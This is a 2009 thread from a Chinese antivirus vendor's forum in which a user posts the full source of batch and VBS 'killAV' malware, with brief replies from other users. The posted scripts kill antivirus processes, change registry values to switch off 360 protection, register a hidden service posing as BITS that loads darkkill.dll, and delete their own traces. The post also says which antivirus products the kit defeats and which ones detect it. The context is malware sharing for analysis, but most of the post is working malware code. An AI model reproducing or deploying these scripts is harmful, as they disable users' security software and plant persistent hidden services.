瑞星卡卡安全论坛
首页
»
技术交流区
»
可疑文件交流
»
又发现bat类killAV类恶意程序【附代码】
程序漏洞 - 2009-8-9 16:05:00
这里有到了两个bat和两个vbs+一个kill. 下面是源码: setdt.vbs的源码: set Cleaner=createobject("wscript.shell") Cleaner.run "setdt.bat",vbhide ....... setdt.bat的源码: @E ...
这里有到了两个bat和两个vbs+一个kill.
下面是源码:
setdt.vbs的源码:
set Cleaner=createobject("wscript.shell")
Cleaner.run "setdt.bat",vbhide
.......
setdt.bat的源码:
@ECHO OFF
@date /t>C:\time.txt
date 1988-09-18
hide.vbs
@date <C:\time.txt
del %SystemRoot%\system32\setdt.vbs
del %SystemRoot%\system32\hide.vbs
del %SystemRoot%\system32\command.exe
del %SystemRoot%\system32\xKill.exe
del %SystemRoot%\system32\xkill.bat
del C:\time.txt
del %0
..................
hide.vbs的源码:
dim shell
set shell=CreateObject("Wscript.Shell")
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
set Cleaner=createobject("wscript.shell")
Cleaner.run "xkill.bat",vbhide
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
......................
xkill.bat的源码:
@echo off
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo 72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0
出处:
http://hi.baidu.com/yffeng/blog/item/73b222235ae78fa34723e83e.html
xkill.exe直接运行后可以结束掉瑞星,nod32,金山
在virscan.org上只有AVG报KILLAV
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
sinoer - 2009-8-9 17:12:00
lz如果有可疑文件,可以跟帖提交样本
程序漏洞 - 2009-8-9 17:36:00
这基本上不算样本,bat文件用户就可以自己制造:kaka6:
Palkia - 2009-8-9 18:56:00
1月份的东西。。。:kaka6:
1
查看完整版本:
又发现bat类killAV类恶意程序【附代码】
© 2000 - 2025 Rising Corp. Ltd.